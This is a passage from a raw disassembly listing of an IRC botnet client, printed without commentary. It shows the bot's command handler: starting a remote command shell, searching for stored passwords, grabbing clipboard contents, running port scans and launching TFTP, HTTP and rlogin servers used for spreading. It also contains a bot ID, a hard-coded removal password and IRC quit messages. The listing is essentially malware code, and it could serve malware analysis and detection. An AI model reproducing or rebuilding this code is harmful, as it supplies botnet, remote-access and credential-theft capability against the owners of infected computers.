lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
loc_40CA34: ; CODE XREF: sub_4089DC+403A�j
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
pop ecx
loc_40CA41: ; CODE XREF: sub_4089DC+3DE9�j
add [ebp+var_18], 0Bh
mov eax, [ebp+var_18]
cmp byte ptr [eax], 0
jnz loc_40C77A
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40CA56: ; CODE XREF: sub_4089DC+4088�j
push 32h
call ds:dword_420000 ; Sleep
loc_40CA5E: ; CODE XREF: sub_4089DC+401A�j
cmp [ebp+var_4C4], esi
jz short loc_40CA56
jmp short loc_40CA13
; ---------------------------------------------------------------------------
loc_40CA68: ; CODE XREF: sub_4089DC+3E87�j
lea eax, [ebp+var_2F0]
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
push eax
call sub_414415
pop ecx
pop ecx
jmp loc_40DD97
; ---------------------------------------------------------------------------
loc_40CA80: ; CODE XREF: sub_4089DC+1845�j
; sub_4089DC+1859�j
push [ebp+var_A0]
lea eax, [ebp+var_B8]
push 80h
push eax
call sub_41466D
mov eax, [ebp+arg_4]
mov [ebp+var_BC], eax
mov eax, [ebp+var_4]
mov [ebp+var_34], eax
mov eax, [ebp+var_C]
push offset aFindpassSearch ; "[FINDPASS]: Searching for password."
mov [ebp+var_30], eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41466D
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Eh
push eax
call sub_41229A
add esp, 24h
mov [ebp+var_38], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_BC]
push eax
push offset sub_40378E
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40CB1E
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aFindpassFail_0 ; "[FINDPASS]: Failed to start search thre"...
jmp loc_40B88E
; ---------------------------------------------------------------------------
loc_40CB16: ; CODE XREF: sub_4089DC+4145�j
push 32h
call ds:dword_420000 ; Sleep
loc_40CB1E: ; CODE XREF: sub_4089DC+4127�j
cmp [ebp+var_2C], esi
jz short loc_40CB16
jmp loc_40D9C2
; ---------------------------------------------------------------------------
loc_40CB28: ; CODE XREF: sub_4089DC+181D�j
; sub_4089DC+1831�j
push 5
call sub_41248A
test eax, eax
pop ecx
jle short loc_40CB4C
lea eax, [ebp+var_2F0]
push offset aTftpAlreadyRun ; "[TFTP]: Already running."
push eax
call sub_414415
xor edi, edi
jmp loc_40E19A
; ---------------------------------------------------------------------------
loc_40CB4C: ; CODE XREF: sub_4089DC+4156�j
mov eax, [ebp+ebx+var_A4]
xor edi, edi
cmp eax, edi
mov esi, 104h
jz short loc_40CB71
push eax
lea eax, [ebp+var_1458]
push esi
push eax
call sub_41466D
add esp, 0Ch
jmp short loc_40CB80
; ---------------------------------------------------------------------------
loc_40CB71: ; CODE XREF: sub_4089DC+4180�j
push esi
lea eax, [ebp+var_1458]
push eax
push edi
call ds:dword_420010 ; GetModuleFileNameA
loc_40CB80: ; CODE XREF: sub_4089DC+4193�j
mov ebx, [ebp+ebx+var_A0]
cmp ebx, edi
jnz short loc_40CB90
mov ebx, offset byte_42BF4C
loc_40CB90: ; CODE XREF: sub_4089DC+41AD�j
push ebx
lea eax, [ebp+var_1354]
push esi
push eax
call sub_41466D
mov eax, dword_42BEBC
mov [ebp+var_1248], eax
mov eax, [ebp+arg_4]
push 7Fh
push [ebp+var_A0]
mov [ebp+var_145C], eax
lea eax, [ebp+var_1244]
push eax
mov [ebp+var_124C], edi
call sub_4144A0
mov eax, [ebp+var_4]
mov [ebp+var_11C4], eax
mov eax, [ebp+var_C]
mov [ebp+var_11C0], eax
lea eax, [ebp+var_1354]
push eax
lea eax, [ebp+var_1458]
push eax
push [ebp+var_1248]
lea eax, [ebp+var_2F0]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_414415
push edi
lea eax, [ebp+var_2F0]
push 5
push eax
call sub_41229A
add esp, 38h
mov [ebp+var_1250], eax
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_145C]
push eax
push offset sub_411DD2
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_1250]
imul ecx, 234h
cmp eax, edi
mov dword_4366B4[ecx], eax
jnz short loc_40CC72
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aTftpFailedTo_0 ; "[TFTP]: Failed to start server thread, "...
push eax
call sub_414415
add esp, 0Ch
jmp loc_40E19C
; ---------------------------------------------------------------------------
loc_40CC6A: ; CODE XREF: sub_4089DC+429C�j
push 32h
call ds:dword_420000 ; Sleep
loc_40CC72: ; CODE XREF: sub_4089DC+426C�j
cmp [ebp+var_11BC], edi
jz short loc_40CC6A
jmp loc_40E19C
; ---------------------------------------------------------------------------
loc_40CC7F: ; CODE XREF: sub_4089DC+17F5�j
; sub_4089DC+1809�j
mov esi, [ebp+ebx+var_A4]
test esi, esi
jz short loc_40CC9E
push esi
call sub_4147A2
test eax, eax
pop ecx
jz short loc_40CC9E
push esi
call sub_4147A2
pop ecx
jmp short loc_40CCA3
; ---------------------------------------------------------------------------
loc_40CC9E: ; CODE XREF: sub_4089DC+42AC�j
; sub_4089DC+42B7�j
mov eax, dword_42BEC0
loc_40CCA3: ; CODE XREF: sub_4089DC+42C0�j
mov ebx, [ebp+ebx+var_A0]
mov [ebp+var_980], eax
xor eax, eax
cmp [ebp+var_458], al
setz al
xor edi, edi
cmp ebx, edi
mov [ebp+var_96C], eax
jz short loc_40CCD8
lea eax, [ebp+var_A84]
push ebx
push eax
call sub_414415
pop ecx
pop ecx
jmp short loc_40CD03
; ---------------------------------------------------------------------------
loc_40CCD8: ; CODE XREF: sub_4089DC+42E9�j
push 104h
lea eax, [ebp+var_8D0]
push eax
call ds:dword_420048 ; GetSystemDirectoryA
push edi
push edi
push edi
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_8D0]
push eax
call sub_415B3D
add esp, 14h
loc_40CD03: ; CODE XREF: sub_4089DC+42FA�j
lea eax, [ebp+var_A84]
lea edx, [eax+1]
loc_40CD0C: ; CODE XREF: sub_4089DC+4335�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40CD0C
sub eax, edx
cmp [ebp+eax+var_A85], 5Ch
jnz short loc_40CD38
lea eax, [ebp+var_A84]
lea edx, [eax+1]
loc_40CD28: ; CODE XREF: sub_4089DC+4351�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40CD28
sub eax, edx
and [ebp+eax+var_A85], cl
loc_40CD38: ; CODE XREF: sub_4089DC+4341�j
push [ebp+var_A0]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_D0C]
push 80h
push eax
mov [ebp+var_D10], esi
call sub_41466D
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_970], eax
lea eax, [ebp+var_A84]
push eax
push [ebp+var_980]
mov [ebp+var_974], ebx
push esi
call sub_407D15
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_414415
push edi
lea eax, [ebp+var_2F0]
push 4
push eax
call sub_41229A
add esp, 20h
mov [ebp+var_978], eax
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_D10]
push eax
push offset sub_404EE8
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_978]
imul ecx, 234h
cmp eax, edi
mov dword_4366B4[ecx], eax
jnz short loc_40CDF3
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedT_1 ; "[HTTPD]: Failed to start server thread,"...
jmp loc_40B2E0
; ---------------------------------------------------------------------------
loc_40CDEB: ; CODE XREF: sub_4089DC+441D�j
push 32h
call ds:dword_420000 ; Sleep
loc_40CDF3: ; CODE XREF: sub_4089DC+43FC�j
cmp [ebp+var_964], edi
jz short loc_40CDEB
jmp loc_40B2EF
; ---------------------------------------------------------------------------
loc_40CE00: ; CODE XREF: sub_4089DC+17CD�j
; sub_4089DC+17E1�j
mov esi, [ebp+ebx+var_A4]
test esi, esi
jz short loc_40CE1F
push esi
call sub_4147A2
test eax, eax
pop ecx
jz short loc_40CE1F
push esi
call sub_4147A2
pop ecx
jmp short loc_40CE24
; ---------------------------------------------------------------------------
loc_40CE1F: ; CODE XREF: sub_4089DC+442D�j
; sub_4089DC+4438�j
mov eax, dword_42BEC4
loc_40CE24: ; CODE XREF: sub_4089DC+4441�j
mov [ebp+var_D2C], eax
mov eax, [ebp+ebx+var_A0]
xor edi, edi
cmp eax, edi
jnz short loc_40CE3D
lea eax, [ebp+var_F0]
loc_40CE3D: ; CODE XREF: sub_4089DC+4459�j
push eax
lea eax, [ebp+var_E6C]
push 40h
push eax
call sub_41466D
mov ebx, [ebp+ebx+var_9C]
add esp, 0Ch
cmp ebx, edi
jnz short loc_40CE5F
mov ebx, 420AEAh
loc_40CE5F: ; CODE XREF: sub_4089DC+447C�j
push ebx
lea eax, [ebp+var_E2C]
push 100h
push eax
call sub_41466D
push [ebp+var_A0]
lea eax, [ebp+var_EEC]
push 80h
push eax
call sub_41466D
mov eax, [ebp+var_C]
mov esi, [ebp+arg_4]
mov ebx, [ebp+var_4]
add esp, 18h
mov [ebp+var_D18], eax
lea eax, [ebp+var_E6C]
push eax
push [ebp+var_D2C]
mov [ebp+var_EF0], esi
push esi
mov [ebp+var_D1C], ebx
call sub_407D15
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aRlogindServerL ; "[RLOGIND]: Server listening on IP: %s:%"...
push eax
call sub_414415
push edi
lea eax, [ebp+var_2F0]
push 7
push eax
call sub_41229A
add esp, 20h
mov [ebp+var_D28], eax
lea eax, [ebp+var_1C]
push eax
push edi
lea eax, [ebp+var_EF0]
push eax
push offset sub_40F6E5
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_D28]
imul ecx, 234h
cmp eax, edi
mov dword_4366B4[ecx], eax
jnz short loc_40CF2C
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to start server threa"...
jmp loc_40B2E0
; ---------------------------------------------------------------------------
loc_40CF24: ; CODE XREF: sub_4089DC+4556�j
push 32h
call ds:dword_420000 ; Sleep
loc_40CF2C: ; CODE XREF: sub_4089DC+4535�j
cmp [ebp+var_D14], edi
jz short loc_40CF24
jmp loc_40B2EF
; ---------------------------------------------------------------------------
loc_40CF39: ; CODE XREF: sub_4089DC+17A5�j
; sub_4089DC+17B9�j
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
jz short loc_40CF4C
push ebx
call sub_4147A2
jmp short loc_40CF53
; ---------------------------------------------------------------------------
loc_40CF4C: ; CODE XREF: sub_4089DC+4566�j
push 9
call sub_4124A9
loc_40CF53: ; CODE XREF: sub_4089DC+456E�j
test eax, eax
pop ecx
jz loc_40E4AE
push eax
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4010CA
jmp loc_40D442
; ---------------------------------------------------------------------------
loc_40CF73: ; CODE XREF: sub_4089DC+177D�j
; sub_4089DC+1791�j
mov eax, dword_4358EC
test eax, eax
jz short loc_40CF96
call eax ; DnsFlushResolverCache
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40CF8F
push offset aFlushdnsDnsCac ; "[FLUSHDNS]: DNS cache flushed."
jmp short loc_40CFB7
; ---------------------------------------------------------------------------
loc_40CF8F: ; CODE XREF: sub_4089DC+45AA�j
push offset aFlushdnsFailed ; "[FLUSHDNS]: Failed to flush DNS cache."
jmp short loc_40CFB7
; ---------------------------------------------------------------------------
loc_40CF96: ; CODE XREF: sub_4089DC+459E�j
push offset aFlushdnsFail_0 ; "[FLUSHDNS]: Failed to load dnsapi.dll."
lea eax, [ebp+var_2F0]
jmp short loc_40CFB7
; ---------------------------------------------------------------------------
loc_40CFA3: ; CODE XREF: sub_4089DC+1755�j
; sub_4089DC+1769�j
call sub_407C37
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40CFC7
push offset aFlushdnsArpC_0 ; "[FLUSHDNS]: ARP cache flushed."
loc_40CFB7: ; CODE XREF: sub_4089DC+45B1�j
; sub_4089DC+45B8�j ...
push 200h
push eax
call sub_41466D
jmp loc_40D8D4
; ---------------------------------------------------------------------------
loc_40CFC7: ; CODE XREF: sub_4089DC+45D4�j
push offset aFlushdnsFail_1 ; "[FLUSHDNS]: Failed to flush ARP cache."
jmp short loc_40CFB7
; ---------------------------------------------------------------------------
loc_40CFCE: ; CODE XREF: sub_4089DC+172D�j
; sub_4089DC+1741�j
cmp [ebp+var_C], 0
jnz short loc_40CFEF
push 0
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
loc_40CFEF: ; CODE XREF: sub_4089DC+45F6�j
push 0
push [ebp+var_4]
call sub_406874
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
push offset aMainGetClipboa ; "[MAIN]: Get Clipboard."
jmp loc_40D30B
; ---------------------------------------------------------------------------
loc_40D012: ; CODE XREF: sub_4089DC+139E�j
; sub_4089DC+13B2�j
push 8
call sub_41248A
test eax, eax
pop ecx
jle short loc_40D028
push offset aCmdRemoteShell ; "[CMD]: Remote shell already running."
jmp loc_40C621
; ---------------------------------------------------------------------------
loc_40D028: ; CODE XREF: sub_4089DC+4640�j
push [ebp+var_A0]
push [ebp+arg_4]
call sub_40F292
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_40D047
push offset aCmdCouldnTOpen ; "[CMD]: Couldn't open remote shell."
jmp loc_40C621
; ---------------------------------------------------------------------------
loc_40D047: ; CODE XREF: sub_4089DC+465F�j
push offset aCmdRemoteShe_0 ; "[CMD]: Remote shell ready."
jmp loc_40C621
; ---------------------------------------------------------------------------
loc_40D051: ; CODE XREF: sub_4089DC+1376�j
; sub_4089DC+138A�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_406359
jmp loc_40D32C
; ---------------------------------------------------------------------------
loc_40D06A: ; CODE XREF: sub_4089DC+134E�j
; sub_4089DC+1362�j
push [ebp+ebx+var_A4]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_402DDF
jmp loc_40D32C
; ---------------------------------------------------------------------------
loc_40D087: ; CODE XREF: sub_4089DC+1326�j
; sub_4089DC+133A�j
or esi, 0FFFFFFFFh
call ds:dword_420004 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
mov edi, eax
jz short loc_40D0AF
push ebx
call sub_4147A2
pop ecx
mov esi, eax
loc_40D0AF: ; CODE XREF: sub_4089DC+46C8�j
xor edx, edx
mov eax, edi
mov ecx, 15180h
div ecx
cmp eax, esi
jnb short loc_40D0C7
cmp esi, 0FFFFFFFFh
jnz loc_40E4AE
loc_40D0C7: ; CODE XREF: sub_4089DC+46E0�j
push 0
call sub_411551
push eax
lea eax, [ebp+var_2F0]
push offset aMainUptimeS_ ; "[MAIN]: Uptime: %s."
push eax
call sub_414415
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
loc_40D106: ; CODE XREF: sub_4089DC+24B3�j
add esp, 28h
jmp loc_40E4AE
; ---------------------------------------------------------------------------
loc_40D10E: ; CODE XREF: sub_4089DC+12FE�j
; sub_4089DC+1312�j
push 1Fh
call sub_41248A
test eax, eax
pop ecx
jle short loc_40D144
cmp [ebp+var_C], 0
jnz loc_408C5A
push 0
push [ebp+var_4]
push offset aProcAlreadyRun ; "[PROC]: Already running."
loc_40D12E: ; CODE XREF: sub_4089DC+1F36�j
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40D144: ; CODE XREF: sub_4089DC+473C�j
push [ebp+var_A0]
lea eax, [ebp+var_450]
push 80h
push eax
call sub_41466D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A4]
and [ebp+var_3CC], 0
mov [ebp+var_454], eax
mov eax, [ebp+var_4]
mov [ebp+var_3C8], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_3C4], eax
jz short loc_40D1A5
push 5
mov edi, ebx
mov esi, offset aFull ; "full"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40D1A5
mov [ebp+var_3CC], 1
loc_40D1A5: ; CODE XREF: sub_4089DC+47AD�j
; sub_4089DC+47BD�j
lea eax, [ebp+var_2F0]
push offset aProcsProccessL ; "[PROCS]: Proccess list."
push eax
call sub_414415
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Fh
push eax
call sub_41229A
add esp, 14h
mov [ebp+var_3D0], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_454]
push eax
push offset sub_4084DD
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_3D0]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40D227
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aProcsFailedToS ; "[PROCS]: Failed to start listing thread"...
push eax
call sub_414415
add esp, 0Ch
jmp loc_40C063
; ---------------------------------------------------------------------------
loc_40D21F: ; CODE XREF: sub_4089DC+4851�j
push 32h
call ds:dword_420000 ; Sleep
loc_40D227: ; CODE XREF: sub_4089DC+4821�j
cmp [ebp+var_3C0], esi
jz short loc_40D21F
jmp loc_40C063
; ---------------------------------------------------------------------------
loc_40D234: ; CODE XREF: sub_4089DC+12D6�j
; sub_4089DC+12EA�j
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
jz loc_408C5A
mov esi, ebx
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40D24A: ; CODE XREF: sub_4089DC+488A�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40D26C
test cl, cl
jz short loc_40D268
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40D26C
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40D24A
loc_40D268: ; CODE XREF: sub_4089DC+4878�j
xor eax, eax
jmp short loc_40D271
; ---------------------------------------------------------------------------
loc_40D26C: ; CODE XREF: sub_4089DC+4874�j
; sub_4089DC+4882�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40D271: ; CODE XREF: sub_4089DC+488E�j
test eax, eax
jnz loc_408C5A
cmp [ebp+var_C], eax
jnz short loc_40D298
push eax
push [ebp+var_4]
push offset aMainRemovingBo ; "[MAIN]: Removing Bot."
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
loc_40D298: ; CODE XREF: sub_4089DC+48A0�j
push [ebp+arg_4]
call dword_435914 ; closesocket
call dword_435920 ; WSACleanup
call sub_4069F7
jmp loc_40D9E7
; ---------------------------------------------------------------------------
loc_40D2B1: ; CODE XREF: sub_4089DC+12AE�j
; sub_4089DC+12C2�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push eax
call sub_4116D2
pop ecx
pop ecx
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
push offset aMainSystemInfo ; "[MAIN]: System Info."
jmp short loc_40D30B
; ---------------------------------------------------------------------------
loc_40D2DD: ; CODE XREF: sub_4089DC+1286�j
; sub_4089DC+129A�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_411939
add esp, 0Ch
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
push offset aMainNetworkInf ; "[MAIN]: Network Info."
loc_40D30B: ; CODE XREF: sub_4089DC+4631�j
; sub_4089DC+48FF�j
call sub_401EFF
loc_40D310: ; CODE XREF: sub_4089DC+339D�j
add esp, 18h
jmp loc_40E4AE
; ---------------------------------------------------------------------------
loc_40D318: ; CODE XREF: sub_4089DC+125E�j
; sub_4089DC+1272�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_401F9F
loc_40D32C: ; CODE XREF: sub_4089DC+1DF�j
; sub_4089DC+4689�j ...
add esp, 10h
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40D334: ; CODE XREF: sub_4089DC+1236�j
; sub_4089DC+124A�j
and [ebp+var_85C], 0
cmp [ebp+var_14], 0
jz short loc_40D375
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
jz short loc_40D375
push ebx
push [ebp+var_14]
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz short loc_40D375
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_85C]
push 80h
push eax
call sub_41466D
add esp, 10h
loc_40D375: ; CODE XREF: sub_4089DC+4963�j
; sub_4089DC+496E�j ...
push [ebp+var_A0]
lea eax, [ebp+var_8DC]
push 80h
push eax
call sub_41466D
mov eax, [ebp+arg_4]
mov [ebp+var_8E0], eax
mov eax, [ebp+var_4]
mov [ebp+var_7D8], eax
mov eax, [ebp+var_C]
mov [ebp+var_7D4], eax
lea eax, [ebp+var_2F0]
push offset aLogListingLog_ ; "[LOG]: Listing log."
push eax
call sub_414415
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Dh
push eax
call sub_41229A
add esp, 20h
mov [ebp+var_7DC], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_8E0]
push eax
push offset sub_402011
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_7DC]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40D41A
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aLogFailedToSta ; "[LOG]: Failed to start listing thread, "...
jmp loc_40E667
; ---------------------------------------------------------------------------
loc_40D412: ; CODE XREF: sub_4089DC+4A44�j
push 32h
call ds:dword_420000 ; Sleep
loc_40D41A: ; CODE XREF: sub_4089DC+4A23�j
cmp [ebp+var_7D0], esi
jz short loc_40D412
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40D427: ; CODE XREF: sub_4089DC+120E�j
; sub_4089DC+1222�j
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_401E87
push offset aMainAliasList_ ; "[MAIN]: Alias list."
call sub_401EFF
loc_40D442: ; CODE XREF: sub_4089DC+4592�j
add esp, 10h
jmp loc_40E4AE
; ---------------------------------------------------------------------------
loc_40D44A: ; CODE XREF: sub_4089DC+11E6�j
; sub_4089DC+11FA�j
push [ebp+var_A0]
lea eax, [ebp+var_384]
push 80h
push eax
call sub_41466D
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A4]
mov [ebp+var_388], eax
mov eax, [ebp+var_4]
mov [ebp+var_2FC], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_2F8], eax
jz short loc_40D4A3
push 4
xor eax, eax
mov edi, offset aSub ; "sub"
mov esi, ebx
pop ecx
repe cmpsb
setz al
mov [ebp+var_300], eax
jmp short loc_40D4AA
; ---------------------------------------------------------------------------
loc_40D4A3: ; CODE XREF: sub_4089DC+4AAC�j
and [ebp+var_300], 0
loc_40D4AA: ; CODE XREF: sub_4089DC+4AC5�j
lea eax, [ebp+var_2F0]
push offset aThreadsListThr ; "[THREADS]: List threads."
push eax
call sub_414415
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 20h
push eax
call sub_41229A
add esp, 14h
mov [ebp+var_304], eax
lea eax, [ebp+var_1C]
push eax
push esi
lea eax, [ebp+var_388]
push eax
push offset sub_41259B
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_304]
imul ecx, 234h
cmp eax, esi
mov dword_4366B4[ecx], eax
jnz short loc_40D52C
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aThreadsFaile_0 ; "[THREADS]: Failed to start list thread,"...
push eax
call sub_414415
add esp, 0Ch
jmp loc_40A0E4
; ---------------------------------------------------------------------------
loc_40D524: ; CODE XREF: sub_4089DC+4B56�j
push 32h
call ds:dword_420000 ; Sleep
loc_40D52C: ; CODE XREF: sub_4089DC+4B26�j
cmp [ebp+var_2F4], esi
jz short loc_40D524
jmp loc_40A0E4
; ---------------------------------------------------------------------------
loc_40D539: ; CODE XREF: sub_4089DC+116C�j
; sub_4089DC+1180�j
push offset aBot014 ; "Bot014"
lea eax, [ebp+var_2F0]
push offset aMainBotIdS_ ; "[MAIN]: Bot ID: %s."
push eax
call sub_414415
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 20h
jmp loc_40A0E4
; ---------------------------------------------------------------------------
loc_40D571: ; CODE XREF: sub_4089DC+1144�j
; sub_4089DC+1158�j
push dword_47BF18
call sub_411551
push eax
lea eax, [ebp+var_2F0]
push offset aMainStatusRead ; "[MAIN]: Status: Ready. Bot Uptime: %s."
push eax
call sub_414415
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 24h
jmp loc_40A0E4
; ---------------------------------------------------------------------------
loc_40D5B0: ; CODE XREF: sub_4089DC+111C�j
; sub_4089DC+1130�j
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
jz short loc_40D5E3
cmp [ebp+var_14], 0
jz short loc_40D5F2
push ebx
push [ebp+var_14]
call sub_414EE0
test eax, eax
pop ecx
pop ecx
jz short loc_40D5F2
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_405674
add esp, 0Ch
jmp short loc_40D5F2
; ---------------------------------------------------------------------------
loc_40D5E3: ; CODE XREF: sub_4089DC+4BDD�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_405674
pop ecx
pop ecx
loc_40D5F2: ; CODE XREF: sub_4089DC+4BE3�j
; sub_4089DC+4BF2�j ...
push 0FFFFFFFEh
pop eax
jmp loc_408C5D
; ---------------------------------------------------------------------------
loc_40D5FA: ; CODE XREF: sub_4089DC+10F4�j
; sub_4089DC+1108�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_405674
push offset aMainDisconnect ; "[MAIN]: Disconnecting."
call sub_401EFF
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_408C5D
; ---------------------------------------------------------------------------
loc_40D61C: ; CODE XREF: sub_4089DC+10CC�j
; sub_4089DC+10E0�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_405674
push offset aMainReconnecti ; "[MAIN]: Reconnecting."
call sub_401EFF
add esp, 0Ch
xor eax, eax
jmp loc_408C5D
; ---------------------------------------------------------------------------
loc_40D63D: ; CODE XREF: sub_4089DC+10A4�j
; sub_4089DC+10B8�j
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_401000
loc_40D64E: ; CODE XREF: sub_4089DC+3304�j
add esp, 0Ch
jmp loc_40E4AE
; ---------------------------------------------------------------------------
loc_40D656: ; CODE XREF: sub_4089DC+1004�j
; sub_4089DC+1018�j
push [ebp+ebx+var_A4]
push 1Fh
push offset aProcessList ; "Process list"
push offset aProc ; "[PROC]"
jmp short loc_40D67E
; ---------------------------------------------------------------------------
loc_40D66B: ; CODE XREF: sub_4089DC+FDC�j
; sub_4089DC+FF0�j
push [ebp+ebx+var_A4]
push 1Ch
push offset aFindFile ; "Find file"
push offset aFindfile_0 ; "[FINDFILE]"
loc_40D67E: ; CODE XREF: sub_4089DC+E39�j
; sub_4089DC+E61�j ...
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4124D0
add esp, 20h
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40D69A: ; CODE XREF: sub_4089DC+DFC�j
; sub_4089DC+E10�j
mov esi, [ebp+ebx+var_A4]
test esi, esi
jz short loc_40D6B9
push esi
call sub_4147A2
test eax, eax
pop ecx
jz short loc_40D6B9
push esi
call sub_4147A2
pop ecx
jmp short loc_40D6BE
; ---------------------------------------------------------------------------
loc_40D6B9: ; CODE XREF: sub_4089DC+4CC7�j
; sub_4089DC+4CD2�j
mov eax, dword_42BEB8
loc_40D6BE: ; CODE XREF: sub_4089DC+4CDB�j
mov ebx, [ebp+ebx+var_A0]
xor edi, edi
cmp ebx, edi
mov [ebp+var_30C], eax
jz short loc_40D6E5
push ebx
loc_40D6D2: ; CODE XREF: sub_4089DC+4D19�j
lea eax, [ebp+var_31C]
push 10h
push eax
call sub_41466D
add esp, 0Ch
jmp short loc_40D6FE
; ---------------------------------------------------------------------------
loc_40D6E5: ; CODE XREF: sub_4089DC+4CF3�j
cmp [ebp+var_45B], 0
jz short loc_40D6F7
lea eax, [ebp+var_F0]
push eax
jmp short loc_40D6D2
; ---------------------------------------------------------------------------
loc_40D6F7: ; CODE XREF: sub_4089DC+4D10�j
and [ebp+var_31C], 0
